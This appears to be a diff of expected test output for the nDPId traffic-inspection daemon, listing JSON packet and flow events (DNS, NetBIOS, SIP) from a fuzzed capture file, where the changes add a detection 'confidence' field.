 00626{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":2115,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"ts_msec":1120470000407,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCENFAADlXL4AAIARWNHAqAEpwKgB\/wCKAIoA0SAWEQKRS8CoASkAigC7AAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEbuRVBGQ0VMRUhGQ0VQRkZGQUNBQyVzAENBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlxU0xPVFxCUk9XU0UAAQCA\/AoATEFCMTExAAAAAA+y781oIgUBAxAAAA8BVaoA"}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2115}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1120470002989,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470002989,"pkt":"ADBUADRWAODtAW69CABFAABEalgAAIARTP3AqAECwKgBAQq3ADUAMKhFfMIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1120470002991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470002991,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrcAR4rBfMKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbChvc3QA"}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470002991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470002991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469831652,"flow_last_seen":1120469835658,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1120469540839,"flow_last_seen":1120469971714,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1092,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1120469540839,"flow_last_seen":1120469971714,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1092,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1120470015072,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470015072,"pkt":"ADBUADRWAODtQW69CABFAABIaloAAIARTPfAqAECwKgBAQq4ADUANOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1120470016067,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470016067,"pkt":"ADBUADRWAODtAW69CABFAABIalsAAIARTPbAqAECwKgBAQq4ADUANOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1120470018070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470018070,"pkt":"ADBUADRWAODtAW69CABFAABIamEAAIARTPDAqAECwKgBAQq4ADUAGOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1120470019512,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470019512,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOamMAAIARS+rAqAECwKgB\/wBYAIkAOluMhQ8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAEgAAE="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469847979,"flow_last_seen":1120469856989,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469940218,"flow_last_seen":1120469948230,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1120470032081,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470032081,"pkt":"ADBUADRWAODtAW69CABFAABEamYAAIARTO\/AqAGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1120470032083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470032083,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrkARxK+9MOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAfRAACwlsb2NhbGhvc3QA"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
